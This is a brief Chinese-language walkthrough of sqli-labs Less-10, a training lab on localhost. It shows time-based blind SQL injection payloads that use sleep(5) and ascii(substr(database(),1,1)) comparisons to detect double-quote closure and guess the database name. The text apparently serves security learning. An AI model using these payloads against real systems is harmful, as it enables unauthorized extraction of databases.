首先我们可以看一下主页
我们试一下看,
有了前面几关的基础后我们可以这样试一下 http://127.0.0.1/Less-10/?id=1' and if(ascii(substr(database(),1,1))>115, 0, sleep(5)) %23 然后发现返回的页面
在试一下 http://127.0.0.1/Less-10/?id=1' and if(ascii(substr(database(),1,1))>114, 0, sleep(5)) %23
我们发现,无论怎样测试返回的都是这样,然后我们就可以猜测是不是基于时间的盲注,
可以看到时间并没有延迟,然后可以猜测是基于双引号的
这样我们看到有延迟出现,说明是双引号闭合
id=1" and if(ascii(substr(database(),1,1))=115,sleep(5),null)%23
http://localhost/sqli-labs/Less-10/?id=1" and if(ascii(substr(database(),1,1))>114, 0, sleep(5)) %23
这时又不会有延迟了